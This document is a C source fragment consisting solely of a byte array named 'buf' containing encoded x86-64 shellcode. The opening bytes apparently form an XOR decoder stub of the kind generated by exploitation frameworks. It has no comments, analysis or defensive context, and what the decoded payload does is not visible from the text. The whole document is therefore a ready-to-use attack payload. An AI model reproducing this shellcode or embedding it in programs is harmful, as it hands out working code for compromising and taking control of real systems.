unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\x2f\x64\x00\x9e\xb7\xac\x82\x53\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xd3\x2c\x83"
"\x7a\x47\x44\x4e\x53\x2f\x64\x41\xcf\xf6\xfc\xd0\x02\x79"
"\x2c\x31\x4c\xd2\xe4\x09\x01\x4f\x2c\x8b\xcc\xaf\xe4\x09"
"\x01\x0f\x29\x31\x57\xff\xa3\x35\x19\x65\x2c\x8b\xec\xe7"
"\xe4\xb3\x93\x83\x58\x61\xe2\xb5\x80\xa2\x12\xee\xad\x0d"
"\xdf\xb6\x6d\x60\xbe\x7d\x25\x51\xd6\x3c\xfe\xa2\xd8\x6d"
"\x58\x48\x9f\x67\xca\x03\x2b\x37\x6f\x02\x91\x32\xde\x82"
"\x53\x2f\xef\x80\x16\xb7\xac\x82\x1b\xaa\xa4\x74\xf9\xff"
"\xad\x52\xd8\x67\x7c\x50\xda\x3c\xec\xa2\x1a\x2e\xb4\xe3"
"\xc8\xff\x53\x4b\x1e\x1e\xad\x41\x15\x83\x24\xca\x52\xf9"
"\x2c\x31\x5e\xf6\x6d\x4b\x5e\x83\x25\x01\x5f\x8f\x4c\xf7"
"\xa2\x63\x67\x4c\xba\xbf\xe9\xbb\x82\x5a\xbc\x58\xda\x3c"
"\xec\xa6\x1a\x2e\xb4\x66\xdf\x3c\xa0\xca\x17\xa4\x24\x1c"
"\xd7\xb6\x7c\xc3\xd8\x2b\xec\x41\xc6\xff\xad\x52\x12\x77"
"\x3a\x59\xc4\xf6\xf4\xc3\x0a\x6e\x3e\x48\x1d\x5b\x8c\xc3"
"\x01\xd0\x84\x58\xdf\xee\xf6\xca\xd8\x3d\x8d\x4b\x61\x48"
"\x53\xdf\x1a\x91\x13\x73\xac\xe8\x9f\xb0\x53\x2f\x25\x56"
"\xd7\x3e\x4a\xca\xd2\xc3\xc4\x01\x9e\xb7\xe5\x0b\xb6\x66"
"\xd8\x02\x9e\xa6\xf7\x42\xfb\x2e\x49\x41\xca\xfe\x25\x66"
"\x1f\xa6\x95\x41\x24\xfb\xdb\xa4\x54\xd0\xb1\x4c\x17\x5d"
"\xc4\x83\x52\x2f\x64\x59\xdf\x0d\x85\x02\x38\x2f\x9b\xd5"
"\xf4\xbd\xed\xdc\x03\x7f\x29\x31\x57\xfa\x9d\x42\x1b\xd0"
"\xa4\x48\x17\x75\xe4\x7d\x93\x67\xed\xc1\xdf\x0d\x46\x8d"
"\x8c\xcf\x9b\xd5\xd6\x3e\x6b\xe8\x43\x6e\x3c\x4c\x17\x55"
"\xe4\x0b\xaa\x6e\xde\x99\x3b\xc3\xcd\x7d\x86\xaa\xa4\x74"
"\x94\xfe\x53\x4c\x26\xca\x8c\x93\x9e\xb7\xac\xca\xd0\xc3"
"\x74\x48\x17\x55\xe1\xb3\x9a\x45\x60\x41\xc6\xff\x25\x7b"
"\x12\x95\x66\xd9\x56\xe8\x53\x57\xd0\xd7\x64\x7e\xcb\xff"
"\x2f\x46\x73\x71\xed\xf6\xf4\xf7\xed\xdb\x3b\x2f\x74\x00"
"\x9e\xf6\xf4\xca\xda\xdd\x2c\x31\x57\xf6\x16\xda\xf7\x7c"
"\x81\xff\x4b\xff\x25\x41\x1a\xa6\xa3\x4d\xaf\x7e\xe5\x0b"
"\xa3\x67\xed\xda\xd6\x3e\x55\xc3\xe9\x2d\xbd\xc8\xc1\x48"
"\x79\x01\xab\x2f\x19\x28\xc6\xf6\xfb\xdb\x3b\x2f\x24\x00"
"\x9e\xf6\xf4\xe8\x53\x75\x25\xba\x95\x98\xa3\xb2\xac\xfa"
"\x33\x59\xdf\x0d\xd9\xec\x1e\x4e\x9b\xd5\xd7\x48\x62\x6b"
"\x6f\xd0\x9b\xff\xd6\xb6\x6f\xca\x7a\xe9\x2c\x85\x68\xc2"
"\x18\xc3\xac\xc8\x3c\x6a\x9e\xee\xe5\x45\x91\xdf\xd1\xa2"
"\xc8\x48\x79\x82\x53";
